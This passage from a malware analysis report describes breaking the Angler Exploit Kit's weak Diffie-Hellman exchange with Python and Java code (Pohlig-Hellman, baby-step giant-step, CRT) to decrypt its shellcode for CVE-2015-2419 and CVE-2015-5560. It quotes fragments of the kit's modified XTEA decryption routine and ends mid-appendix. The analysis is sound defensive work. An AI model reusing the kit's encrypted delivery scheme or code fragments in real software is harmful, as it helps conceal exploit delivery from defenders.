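    """Steps 5.1-5.5: return x in [0, q] with da^x == db (mod p), or None.

    Giant steps Dc^u (Dc = Da^H) go into a table, baby steps Db * Da^v are looked
    up in it, and a hit gives x = H*u - v. No modular inverse is needed, which
    matters because p is composite and inverses need not exist.
    """
    H = isqrt(q) + 1
    dc = pow(da, H, p)
    table, cur = {}, 1
    for u in range(1, H + 1):
        cur = cur * dc % p                 # Dc^u
        table.setdefault(cur, u)
    cur = db % p
    for v in range(H + 1):
        u = table.get(cur)                 # cur == Db * Da^v
        if u is not None:
            return H * u - v
        cur = cur * da % p
    return None


def crt(residues, moduli):
    """Step 6: combine x == r_i (mod m_i) for pairwise coprime moduli."""
    n = product(moduli)
    x = 0
    for r, m in zip(residues, moduli):
        big_m = n // m
        x += r * big_m * pow(big_m, -1, m)
    return x % n


def pohlig_hellman(g, a, p, phi, prime_powers):
    """Return X with g^X == a (mod p), given the prime-power factors Q_i of phi(p)."""
    if gcd(g, p) != 1 or gcd(a, p) != 1:
        # Euler's theorem (g^phi == 1 mod p) fails for non-units, so the reduction
        # into subgroups of order dividing Q_i is not valid.
        raise ValueError("g or A is not invertible modulo p")
    residues = []
    for q in prime_powers:
        e = phi // q
        x = bsgs_no_inverse(pow(g, e, p), pow(a, e, p), q, p)
        if x is None:
            return None
        residues.append(x % q)
    big_x = crt(residues, prime_powers)
    return big_x if pow(g, big_x, p) == a else None


def recover_shared_secret(g, a, b, p, phi, prime_powers):
    """Steps 7-8 input: Kdh = B^Ka mod p from the intercepted g, A, B and p. Any Ka'
    with g^Ka' == A gives the same Kdh, so one residue per Q_i is enough."""
    x = pohlig_hellman(g, a, p, phi, prime_powers)
    return None if x is None else pow(b, x, p)


# Values printed on the page: factorizations of p and phi(p), g, A and B (Appendix A).
P_FACTORS = [2, 101, 521, 195197, 7138079603, 245150552958961933]
PHI_PRIME_POWERS = [1024, 9, 125, 13, 19, 79, 167, 383, 48799, 45177719, 5603527793]
P = product(P_FACTORS)
PHI = product(f - 1 for f in P_FACTORS)          # p is squarefree
G = int("40a262b1360a6a16612ca8251161a9a5", 16) % P
A = int("5eff90f1c48342f5d519cd02b5dfd8b", 16)
B = int("02aa6526e6edc0042394b7ea81ec5b75", 16)


def angler_shared_secret():
    return recover_shared_secret(G, A, B, P, PHI, PHI_PRIME_POWERS)


def toy_exchange():
    """Steps 1-4 on a constructed small modulus p = 2*101*521 (phi = 2^5*5^3*13),
    without the XTEA layer, so the recovered secret can be checked against the
    one both parties actually computed."""
    p, g, ka, kb = 2 * 101 * 521, 7, 12345, 6789
    a, b = pow(g, ka, p), pow(g, kb, p)            # public keys exchanged in the clear
    real_kdh = pow(a, kb, p)                       # what the server computes
    return recover_shared_secret(g, a, b, p, 52000, [32, 125, 13]), real_kdh


if __name__ == "__main__":
    print("toy exchange (recovered, real):", toy_exchange())
    print("Angler Kdh: %032x" % angler_shared_secret())
```

The gcd check is not cosmetic: p here is a random 128-bit composite, and Euler's theorem, on which the reduction to subgroups of order Qi rests, only holds for elements invertible modulo p. The whole attack exists because the browser picks p at random without a primality or safe-prime check, so φ(p) is usually smooth; a standard safe-prime group of adequate size has a huge prime factor in φ(p) and step 5 becomes infeasible.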

Testing of the Diffie-Hellman Protocol Implementation Attack in the Angler Exploit Kit

To test the effectiveness and functionality of the attack, several tests were conducted.

1. A test with a traffic dump containing the exploit for CVE-2015-2419.


{"B":"481dbc66fe90ded2eb8d027395abe4fd", …

p = 146455792068641286704746413745292278846 = 2 * 2269 * 1057223 * 1292823547 * 23612186462182360807

φ(p) = 73195553541542938096767116236244889696 = 2^5 * 3^6 * 7^3 * 17 * 617 * 7127 * 528611 * 231492024139042753

Owing to a large factor of φ(p) (about 10^18), finding the Diffie-Hellman shared secret took several hours:


The decrypted shellcode is given in the Appendix D.

2. A test with a traffic dump containing the exploits for CVE-2015-2419 and CVE-2015-5560.

The new version of the Angler Exploit Kit has minor changes in the server-to-script communication protocol:



As compared with the previous version, the indices "g", "A", "p", "B", "b" and "k" were replaced by parts of the number g, and the order of the numbers sent to the server was changed (now it is g, p, A rather than g, A, p as before). Besides that, two constants of the XTEA algorithm and a bit operation used when decrypting the shellcode were modified:

Before (the original XTEA implementation):
for(var h=g[0],k=g[1],l=84941944608;0!=l;)
h-=(k<<4^k>>>5)+k^l+d[l&3];

After:
for(var h=g[0],k=g[1],l=433284421593;0!=l;)
For the given traffic, we managed to factorize the Euler function φ(p)

p = 123758666691284322087508686576379854395 = 5 * 11 * 47 * 73 * 83 * 173 * 1055371 * 43277569507162384847671

φ(p) = 85339058418474058501009217357034700800 = 2^14 * 3^6 * 5^2 * 23 * 41 * 43 * 127 * 277 * 1949 * 102798053917762603

find the Diffie-Hellman shared secret


and decrypt the shellcode for CVE-2015-2419 (given in the Appendix E).

In addition, in the new version of the Angler Exploit Kit the threat actors started to use the Diffie-Hellman key exchange pattern for Flash exploits as well (i.e., the creators of the exploit kit implemented the same algorithms in PHP, JavaScript and ActionScript). The exploit and shellcode download protocol for the Flash vulnerability is the same as for the Internet Explorer shellcode:

The modulus p and the factors of the Euler function φ(p):

p = 81152602799751951422044316006212054554 = 2 * 3 * 36329424479 * 10983441260369 * 33896452871009

φ(p) = 27050867599169456821145398677392574464 = 2^11 * 7 * 13 * 199 * 91279961 * 11640265409 * 686465078773

the Diffie-Hellman shared secret:


The decrypted exploit and shellcode for CVE-2015-5560 is given in the Appendix F.

Appendix A. The Diffie-Hellman Protocol Attack Implementation in Java

import java.math.BigInteger;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Set;
import java.util.TreeMap;
import java.util.Vector;

public class Test1 {

    // Modulus p, its Euler function psi = phi(p), the generator g (reduced mod p)
    // and the two public keys A and B, all taken from the intercepted traffic.
    static BigInteger p = new BigInteger("1b0b5c6e6b0b5b7e6c6d0b1b0a8c3c7e", 16);
    static BigInteger psi = new BigInteger("17761863220777184249809368812124288000");
    static BigInteger g = new BigInteger("40a262b1360a6a16612ca8251161a9a5", 16).mod(p);
    static BigInteger A = new BigInteger("5eff90f1c48342f5d519cd02b5dfd8b", 16);
    static BigInteger B = new BigInteger("02aa6526e6edc0042394b7ea81ec5b75", 16);

    // Pairwise coprime prime-power factors Q_i of phi(p)
    static long[] q = new long[]{1024L, 9L, 125L, 13L, 19L, 79L, 167L, 383L, 48799L, 45177719L, 5603527793L};
    static int q_len = q.length;

    static HashSet[] xi = new HashSet[q_len];        // possible values of Ka modulo each Q_i
    static BigInteger ai[] = new BigInteger[q_len];  // residue currently chosen for each Q_i
    static HashSet res = new HashSet();              // resulting shared secrets Kdh

    // Walks every combination of residues; at the leaves the Chinese remainder
    // theorem gives a candidate Ka modulo phi(p) and hence Kdh = B^Ka mod p.
    static void rec(int ind) {
        if (ind == q_len) {
            BigInteger x = BigInteger.ZERO;
            for (int i = 0; i < q_len; i++) {
                BigInteger mn = new BigInteger(((Long) q[i]).toString());
                BigInteger M = psi.divide(mn);
                x = x.add(ai[i].multiply(M).multiply(M.modInverse(mn)));
            }
            res.add(B.modPow(x.mod(psi), p));
            return;
        }
        Iterator<Long> it = xi[ind].iterator();
        while (it.hasNext()) {
            ai[ind] = new BigInteger(it.next().toString());
            rec(ind + 1);
        }
    }

    public static void main(String[] args) {
        for (int i = 0; i < q_len; i++) {
            xi[i] = new HashSet<Long>();
            long qi = q[i];
            int H = (int) Math.sqrt((double) qi) + 1;   // baby-step/giant-step bound (step 5.1)

            BigInteger _a = g.modPow(psi